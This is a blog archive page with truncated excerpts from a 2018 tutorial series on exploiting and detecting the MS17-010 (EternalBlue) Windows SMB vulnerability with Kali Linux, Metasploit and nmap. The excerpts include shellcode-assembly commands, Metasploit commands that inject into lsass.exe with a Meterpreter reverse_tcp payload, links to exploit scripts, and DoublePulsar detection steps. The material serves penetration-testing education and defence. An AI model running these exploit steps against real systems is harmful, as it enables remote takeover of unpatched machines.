Posts

Showing posts from January, 2018

MS17-010 Vulnerability - EternalBlue exploit using a binary payload and python script on Windows 7 and Windows 2008 R2 targets

In this video we exploit the MS17-010 vulnerability (EternalBlue) on Windows 7 and Windows 2008 R2 targets. We use the shellcode (binary payloads) that we previously generated, in addition to a Python script and the Metasploit Framework. Please check my previous post on generating the shellcode: "Generating shellcode - using msfvenom to generate a binary payload". We also need Worawit's eternalblue7_exploit.py Python script, which can be downloaded from the following GitHub URL: https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a

Before starting the actual target exploitation, we need to configure the multi handler exploit in the Metasploit Framework. The multi handler exploit runs in listening mode and is necessary in order to establish the Meterpreter session between the attacker machine (Kali Linux OS) and the target machine (Windows OS). It is essential to configure the multi handler with the same Metasploit payload, LHOST and LPORT values that were previously u

Generating shellcode - using msfvenom to generate a binary payload

In this video we generate a binary payload (shellcode) that we will use later on to exploit the EternalBlue Windows OS vulnerability. The article below is an excellent introduction to how a binary payload works: https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/

Our payload has two parts that will be generated independently, then combined into a single file. The first component is the Windows x64 kernel shellcode for the EternalBlue exploit; the ASM code is downloaded from the following location: https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501

We will use nasm (a general-purpose x86 assembler) on Kali Linux to assemble the kernel shellcode, with the command below:

nasm -f bin eternalblue_x64_kshellcode.asm -o sc_x64_kernel.bin

The output of this command (and the first component of our payload) is the "sc_x64_kernel.bin" file. The second component of our payload is the part of the code which will create t

MS17-010 Vulnerability - Detecting and uninstalling DoublePulsar implant

In this video we will identify computers affected by the MS17-010 vulnerability which were compromised with the DoublePulsar implant. The detection task will be performed using Countercept's DoublePulsar detection script, which can be downloaded from the following GitHub location: https://github.com/countercept/doublepulsar-detection-script The same script can also be used for uninstalling the DoublePulsar implant. Check also my other posts on how to install the DoublePulsar module and on how to use the DoublePulsar exploit module.

Commands used in this video:

git clone https://github.com/countercept/doublepulsar-detection-script.git
This command creates a local copy of the "doublepulsar-detection-script" Git repository.

python detect_doublepulsar_smb.py --ip <IP_Address>
This command checks whether the target at <IP_Address> is compromised with the DoublePulsar implant.

python detect_doublepulsar_smb.py --ip <IP_Address> --uninstall --

MS17-010 Vulnerability - Using DoublePulsar exploit module in Metasploit

In this video we will use ElevenPaths' DoublePulsar module in order to exploit the MS17-010 vulnerability. You can check my other posts on how to identify the MS17-010 vulnerability by scanning with NMAP and by scanning with a Metasploit auxiliary module. Check also my post on how to install Wine32 and ElevenPaths' DoublePulsar module.

Metasploit commands used in this video:

search doublepulsar
This command identifies modules containing the "doublepulsar" string.

use exploit/windows/smb/eternalblue_doublepulsar
This command selects the "exploit/windows/smb/eternalblue_doublepulsar" module.

show options
This command displays the options available for the selected module.

set processinject lsass.exe
This command selects the process to inject the payload into.

set rhost <IP_Address>
This command sets the target IP address.

set targetarchitecture x64
This command sets the x64 architecture for the target (by default it is x86).

show

MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Previously we identified the MS17-010 vulnerability by scanning with NMAP and by scanning with a Metasploit auxiliary module. In the video below we will exploit the MS17-010 vulnerability using the EternalBlue Metasploit module, which ships by default with the Metasploit Framework.

Metasploit commands used in this video:

search ms17_010
This command identifies modules containing the "ms17_010" string.

use exploit/windows/smb/ms17_010_eternalblue
This command selects the "exploit/windows/smb/ms17_010_eternalblue" module.

show options
This command displays the options available for the selected module.

set processname lsass.exe
This command selects the process to inject the payload into.

set rhost <IP_Address>
This command sets the target IP address.

show payloads
This command (when executed in the module context) shows the payloads compatible with the selected module.

set payload windows/x64/meterpreter/reverse_tcp
This command select

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux

In the video below we will identify computers affected by the MS17-010 vulnerability by using a Metasploit auxiliary scanning module. Check also my other post on detecting the MS17-010 vulnerability using NMAP.

MS17-010 is a severe SMB Server vulnerability which affected all Windows operating systems and was exploited by the WannaCry, Petya and Bad Rabbit ransomware. This vulnerability was made public in March 2017 and allowed remote code execution on the victim computer. For more information, check the Microsoft Security Bulletin MS17-010:
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010
https://support.microsoft.com/en-au/help/4013389/title

Metasploit commands used in this video:

search name:ms17_010
This command lists the Metasploit modules containing the string "ms17_010" in the name. You can also simply use: search ms17_010

use auxiliary/scanner/smb/smb_ms17_010
This command selects the module "auxiliary/scanner/smb/sm

MS17-010 Vulnerability - Scanning using NMAP on KALI Linux

MS17-010 is a severe SMB Server vulnerability affecting all Windows operating systems, which was made public in March 2017. It allows remote code execution on the victim computer and was exploited by the WannaCry, Petya and Bad Rabbit ransomware (and many others...). For more information, check the Microsoft Security Bulletin MS17-010:
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010
https://support.microsoft.com/en-au/help/4013389/title

Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing, which is installed by default on Kali Linux. Check the NMAP website for more information:
https://nmap.org/
https://nmap.org/book/man.html

The NMAP Scripting Engine (NSE) allows users to write scripts for NMAP and share them. NSE scripts can be used for network discovery, vulnerability detection, vulnerability exploitation, OS version detection, backdoor detection and so on. For more informat

Installing Wine32 and DoublePulsar on Kali Linux

The wine32 Kali Linux package and the DoublePulsar Metasploit module are needed for some of the next testing scenarios. We will install the software as presented in the video below.

Commands used during this video:

dpkg -l *wine*
This command lists the package names containing the string "wine".

dpkg --add-architecture i386 && apt-get update && apt-get install wine32
This command performs the following:
- adds the i386 architecture (this is necessary because we are installing 32-bit software on a 64-bit OS, and it makes sure that the software dependencies are correctly resolved)
- updates the package lists from the repositories
- installs the wine32 package

pwd
This command writes the full path name of the current working directory to standard output.

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
This command creates a local copy of the "Eternalblue-Doublepulsar-Metasploit" Git repository.

search double (Metasploit

Installing Kali Linux as a VMware Virtual Machine

Kali Linux is arguably the most popular Linux distribution designed for penetration testing, security auditing and digital forensics. It is free and includes more than 600 penetration testing tools. In the video below we will create a VMware virtual machine running the latest version of Kali Linux. After installation we will apply the latest updates.

Official Kali Linux downloads URL: https://www.kali.org/downloads/
Offensive Security download page URL: https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/

Default Kali Linux credentials:
User: root
Password: toor

Commands used to update the Kali Linux installation:

apt-get update
This command downloads the package lists from the repositories and retrieves information on the newest versions of packages and their dependencies.

apt-get dist-upgrade
This command installs the newest versions of all packages currently installed on the system, from the sources updated as per